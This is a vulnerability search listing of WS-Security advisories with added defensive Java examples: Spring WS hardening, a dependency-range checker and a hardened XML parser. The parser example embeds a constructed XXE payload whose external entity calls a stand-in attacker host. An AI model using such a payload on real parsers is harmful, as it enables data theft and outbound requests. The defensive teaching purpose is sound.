24 matches found
CVE-2026-40996 Inbound WS-Security allows RSA PKCS#1 v1.5 key transport by default
Wss4jSecurityInterceptor defaulted allowRSA15KeyTransportAlgorithm to true, overriding Apache WSS4J's safer default for the validation RequestData. Inbound WS-Security decryption could therefore accept RSA PKCS#1 v1.5 (rsa-15) encrypted key material unless operators explicitly reconfigured the flag...
CVE-2026-40994 Wss4jSecurityInterceptor disables WS-I BSP validation by default
Wss4jSecurityInterceptor initialized its WS-I Basic Security Profile (BSP) compliance flag so that inbound validation disabled WSS4J's BSP enforcement on RequestData. Services that validate WS-Security on the network could therefore accept messages that violate BSP rules, weakening protocol-level...
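Both Spring Web Services advisories above come down to an interceptor default that has to be overridden explicitly. The configuration below is an added example, not code from Spring Web Services or from the advisories: it assumes the Spring WS wss4j2 package, the setter names setAllowRSA15KeyTransportAlgorithm and setBspCompliant (taken from the flag names the advisories quote), and a hypothetical PKCS#12 keystore named server-keystore.p12 on the classpath.

```java
import java.util.List;

import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.core.io.ClassPathResource;
import org.springframework.ws.config.annotation.EnableWs;
import org.springframework.ws.config.annotation.WsConfigurerAdapter;
import org.springframework.ws.server.EndpointInterceptor;
import org.springframework.ws.soap.security.wss4j2.Wss4jSecurityInterceptor;
import org.springframework.ws.soap.security.wss4j2.callback.KeyStoreCallbackHandler;
import org.springframework.ws.soap.security.wss4j2.support.CryptoFactoryBean;

@Configuration
@EnableWs
public class WsSecurityConfig extends WsConfigurerAdapter {

    // Hypothetical keystore holding the service's signing/decryption key (assumption, not from the advisories).
    @Bean
    public CryptoFactoryBean serverCrypto() {
        CryptoFactoryBean crypto = new CryptoFactoryBean();
        crypto.setKeyStoreLocation(new ClassPathResource("server-keystore.p12"));
        crypto.setKeyStoreType("PKCS12");
        crypto.setKeyStorePassword("changeit");
        return crypto;
    }

    @Bean
    public Wss4jSecurityInterceptor wsSecurityInterceptor() throws Exception {
        Wss4jSecurityInterceptor interceptor = new Wss4jSecurityInterceptor();

        // Inbound: every request must carry a Timestamp, a Signature and an encrypted body.
        interceptor.setValidationActions("Timestamp Signature Encrypt");
        interceptor.setValidationSignatureCrypto(serverCrypto().getObject());
        interceptor.setValidationDecryptionCrypto(serverCrypto().getObject());
        KeyStoreCallbackHandler keyPasswords = new KeyStoreCallbackHandler();
        keyPasswords.setPrivateKeyPassword("changeit"); // password of the decryption key (assumed)
        interceptor.setValidationCallbackHandler(keyPasswords);

        // CVE-2026-40996: never inherit the interceptor default; refuse rsa-15 key transport outright.
        interceptor.setAllowRSA15KeyTransportAlgorithm(false);
        // CVE-2026-40994: keep WS-I BSP enforcement on explicitly rather than trusting the default.
        interceptor.setBspCompliant(true);

        // Outbound: pin key transport to RSA-OAEP so this service never asks a peer to use rsa-15.
        interceptor.setSecurementEncryptionKeyTransportAlgorithm(
                "http://www.w3.org/2001/04/xmlenc#rsa-oaep-mgf1p");
        return interceptor;
    }

    @Override
    public void addInterceptors(List<EndpointInterceptor> interceptors) {
        try {
            interceptors.add(wsSecurityInterceptor());
        } catch (Exception e) {
            throw new IllegalStateException("WS-Security interceptor could not be built", e);
        }
    }
}
```

Setting both flags in code removes the dependence on the library default, but it is defense in depth only: for CVE-2026-40994 the advisory says the flag was wired so that validation disabled enforcement, so the explicit value is only trustworthy on a Spring WS release that contains the fix. Upgrade first, then keep the explicit settings so a later default change cannot reopen the hole. Refusing rsa-15 on the inbound side matters because a server that decrypts PKCS#1 v1.5 key transport and reports failures differently can be driven as a padding oracle against the encrypted key; RSA-OAEP has no such oracle.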
CVE-2026-9319
IBM WebSphere Application Server 9.0 and 8.5 are vulnerable to potential remote code execution due to deserialization of untrusted data via JAX-WS endpoints with WS-Security...
BLADE: Behavior-Level Anomaly Detection Using Network Traffic in Web Services
With their widespread popularity, web services have become the main targets of various cyberattacks. Existing traffic anomaly detection approaches focus on flow-level attacks, yet fail to recognize behavior-level attacks, which appear benign in individual flows but reveal malicious purpose using...
EUVD-2019-16962
Malware in sbrugna...
EUVD-2021-1660
Malware in sbrugna...
EUVD-2020-17844
Malware in sbrugna...
EUVD-2024-0599
Malicious code in bioql PyPI...
EUVD-2023-0918
Malicious code in bioql PyPI...
EUVD-2022-4587
Malicious code in bioql PyPI...
Apache CXF code issue vulnerability
Apache CXF is an open source web services framework from the Apache Software Foundation (United States). The framework supports a variety of web services standards, a variety of front-end programming APIs, and so on. A code issue vulnerability exists in Apache CXF versions prior to 3.5.5 and 3.4.10,...
br.net.woodstock.rockframework:rockframework-web (>=1.2.1 <=1.2.2), com.cybersource:cybersource-sdk-java (>=6.0.1 <=6.1.0) +333 more potentially affected by CVE-2015-0226 via org.apache.ws.security:wss4j (>=1.5.2 <=1.6.16)
org.apache.ws.security:wss4j MAVEN version =1.5.2, =1.2.1, =6.0.1, =1.0.1, =1.1.0.Beta5, =1.1.0.Beta1, =1.0.0, =1.2.0 and more. Source CVEs: CVE-2015-0226. Source advisory: OSV:GHSA-VJWC-5HFH-2VV5...
br.net.woodstock.rockframework:rockframework-web (>=1.2.1 <=1.2.2), com.cybersource:cybersource-sdk-java (>=6.0.1 <=6.1.0) +333 more potentially affected by CVE-2014-3623 via org.apache.ws.security:wss4j (>=1.5.2 <=1.6.16)
org.apache.ws.security:wss4j MAVEN version =1.5.2, =1.2.1, =6.0.1, =1.0.1, =1.1.0.Beta5, =1.1.0.Beta1, =1.0.0, =1.2.0 and more. Source CVEs: CVE-2014-3623. Source advisory: OSV:GHSA-99V3-9X35-C5VF...
com.fluxcorp.plugins:webservice-trigger (>=1.0.2 <=1.0.4), com.github.mkluas:web-admin (>=1.0.0 <=1.1.0) +66 more potentially affected by CVE-2014-0034 via org.apache.cxf:cxf-rt-ws-security (>=2.0.6 <=2.6.11)
org.apache.cxf:cxf-rt-ws-security MAVEN version =2.0.6, =1.0.2, =1.0.0, =4.0.3, =2.5.0, =2.1.7, =2.6.11 and more. Source CVEs: CVE-2014-0034. Source advisory: OSV:GHSA-38X2-FP9M-87MX...
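The three dependency-graph entries above only matter if the vulnerable artifact actually ends up on your classpath, usually pulled in transitively by something like cybersource-sdk-java. The checker below is an added example, not OSV's or GitHub's tooling: it takes the artifact names and inclusive ranges exactly as listed above, scans constructed `mvn dependency:tree` output (not from any real project), and reports every resolved version that falls inside a range. The version comparison is a deliberate approximation of Maven's ordering, as noted in the code.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class AffectedRangeCheck {

    /** One affected range as listed in the entries above: inclusive bounds on a single Maven artifact. */
    record Advisory(String artifact, String lower, String upper, String cve) {}

    static final List<Advisory> ADVISORIES = List.of(
            new Advisory("org.apache.ws.security:wss4j", "1.5.2", "1.6.16", "CVE-2015-0226"),
            new Advisory("org.apache.ws.security:wss4j", "1.5.2", "1.6.16", "CVE-2014-3623"),
            new Advisory("org.apache.cxf:cxf-rt-ws-security", "2.0.6", "2.6.11", "CVE-2014-0034"));

    /** Constructed sample of `mvn dependency:tree` output; not output from any real project. */
    static final String SAMPLE_TREE = """
            [INFO] com.example:app:jar:1.0.0
            [INFO] +- com.cybersource:cybersource-sdk-java:jar:6.1.0:compile
            [INFO] |  \\- org.apache.ws.security:wss4j:jar:1.6.16:compile
            [INFO] +- org.apache.cxf:cxf-rt-ws-security:jar:2.7.0:compile
            [INFO] \\- org.apache.cxf:cxf-rt-frontend-jaxws:jar:2.7.0:compile
            """;

    // groupId:artifactId:jar:version:scope, as the plugin prints resolved dependencies.
    static final Pattern DEP = Pattern.compile("([\\w.-]+):([\\w.-]+):jar:([\\w.-]+):\\w+");

    /**
     * Approximate Maven ordering: numeric segments compared numerically, missing segments count as 0,
     * non-numeric qualifiers compared as text. Adequate for the purely numeric ranges above; use
     * org.apache.maven.artifact.versioning.ComparableVersion when qualifiers such as Beta matter.
     */
    static int compareVersions(String a, String b) {
        String[] pa = a.split("[.-]"), pb = b.split("[.-]");
        int n = Math.max(pa.length, pb.length);
        for (int i = 0; i < n; i++) {
            String x = i < pa.length ? pa[i] : "0", y = i < pb.length ? pb[i] : "0";
            int c = (x.matches("\\d+") && y.matches("\\d+"))
                    ? Long.compare(Long.parseLong(x), Long.parseLong(y))
                    : x.compareTo(y);
            if (c != 0) return c;
        }
        return 0;
    }

    static boolean inRange(String version, Advisory adv) {
        return compareVersions(version, adv.lower()) >= 0 && compareVersions(version, adv.upper()) <= 0;
    }

    /** Scans dependency:tree text and returns one "artifact:version -> CVE" line per hit. */
    static List<String> findAffected(String tree) {
        List<String> hits = new ArrayList<>();
        for (String line : tree.split("\n")) {
            Matcher m = DEP.matcher(line);
            if (!m.find()) continue; // the root module line has no scope and is skipped
            String artifact = m.group(1) + ":" + m.group(2), version = m.group(3);
            for (Advisory adv : ADVISORIES) {
                if (adv.artifact().equals(artifact) && inRange(version, adv)) {
                    hits.add(artifact + ":" + version + " -> " + adv.cve());
                }
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        findAffected(SAMPLE_TREE).forEach(System.out::println);
    }
}
```

On the sample tree the transitive wss4j 1.6.16 sits at the top of both wss4j ranges and is reported against CVE-2015-0226 and CVE-2014-3623, while cxf-rt-ws-security 2.7.0 is above the 2.6.11 upper bound and is not. Run the real `mvn dependency:tree` with the `-Dverbose` flag if you also want to see versions that Maven's nearest-wins resolution omitted.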
UBUNTU-CVE-2020-13577
A denial-of-service vulnerability exists in the WS-Security plugin functionality of Genivia gSOAP 2.8.107. A specially crafted SOAP request can lead to denial of service. An attacker can send an HTTP request to trigger this vulnerability...
PT-2020-6525 · Genivia · Gsoap
Name of the Vulnerable Software and Affected Versions: Genivia gSOAP version 2.8.107 Description: A denial-of-service issue exists in the WS-Security plugin functionality of Genivia gSOAP. It can be triggered by a specially crafted SOAP request, allowing an attacker to send an HTTP request and...
CVE-2020-12606
DB Soft SGLAC prior to 20.05.001 is affected. The vulnerability resides in the ProcedimientoGenerico method of the SVCManejador.svc webservice, enabling an attacker to execute arbitrary SQL commands on the SQL Server via xp_cmdshell. CVSS details in the provided data indicate a high/critical impa...
WSSAT v2.0 - Web Service Security Assessment Tool
WSSAT is an open source web service security scanning tool which provides a dynamic environment to add, update or delete vulnerabilities by just editing its configuration files. This tool accepts WSDL address list as input file and for each service, it performs both static and dynamic tests again...
Web Service Security Assessment Tool: WSSAT
WSSAT is an open source web service security scanning tool which provides a dynamic environment to add, update or delete vulnerabilities by just editing its configuration files. This tool accepts WSDL address list as input file and for each service, it performs both static and dynamic tests again...
OpenJDK: insecure XML parsing in wsdlimport (JAX-WS, 8182054)
It was discovered that the wsdlimport tool in the JAX-WS component of OpenJDK did not use secure XML parser settings when parsing WSDL XML documents. A specially crafted WSDL document could cause wsdlimport to use an excessive amount of CPU and memory, open connections to other hosts, or leak...
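The advisory above names the three classic consequences of parsing attacker-supplied XML with default settings: entity-expansion CPU and memory blowup, outbound connections to hosts named in the document, and file or data leakage through external entities. The code below is an added example, not OpenJDK's wsdlimport or its fix: it builds a DocumentBuilderFactory with the settings a hardened importer applies, feeds it a constructed hostile WSDL (the hostname uses the reserved .invalid domain, so it never resolves), and contrasts it with the default factory.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

import org.w3c.dom.Document;

public class HardenedWsdlParsing {

    /** Constructed hostile WSDL (not a real service): a DTD declaring an external entity used in element content. */
    static final String HOSTILE_WSDL = """
            <?xml version="1.0"?>
            <!DOCTYPE definitions [
              <!ENTITY ext SYSTEM "http://attacker.invalid/secret">
            ]>
            <definitions xmlns="http://schemas.xmlsoap.org/wsdl/">
              <documentation>&ext;</documentation>
            </definitions>
            """;

    /** Parser settings an importer must apply before touching a WSDL it did not write. */
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setNamespaceAware(true);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);               // entity expansion limits
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); // no DTD at all: blocks XXE and billion laughs
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }

    /** Parses the document and returns the root element name, or the reason the parser refused it. */
    static String parse(DocumentBuilderFactory f, String xml) {
        try {
            Document doc = f.newDocumentBuilder()
                    .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return "parsed <" + doc.getDocumentElement().getTagName() + ">";
        } catch (Exception e) {
            return "rejected: " + e.getClass().getSimpleName() + ": " + e.getMessage();
        }
    }

    public static void main(String[] args) throws Exception {
        // Hardened: the DOCTYPE itself is refused, so no entity is ever resolved and no connection is attempted.
        System.out.println("hardened -> " + parse(hardenedFactory(), HOSTILE_WSDL));
        // Default factory: while expanding &ext; the parser reaches out to http://attacker.invalid/secret,
        // the kind of outbound connection the advisory describes; it fails here only because .invalid never
        // resolves (unless the JDK's jaxp access properties have been restricted system-wide).
        System.out.println("default  -> " + parse(DocumentBuilderFactory.newInstance(), HOSTILE_WSDL));
    }
}
```

The disallow-doctype-decl feature is the one that does most of the work, since a document without a DTD can declare no entities at all; the remaining features are there for code paths that must accept a DTD, and FEATURE_SECURE_PROCESSING adds the JDK's entity-expansion and size limits on top. The same factory settings apply to SAX and StAX parsers that consume WSDL or XSD from the network.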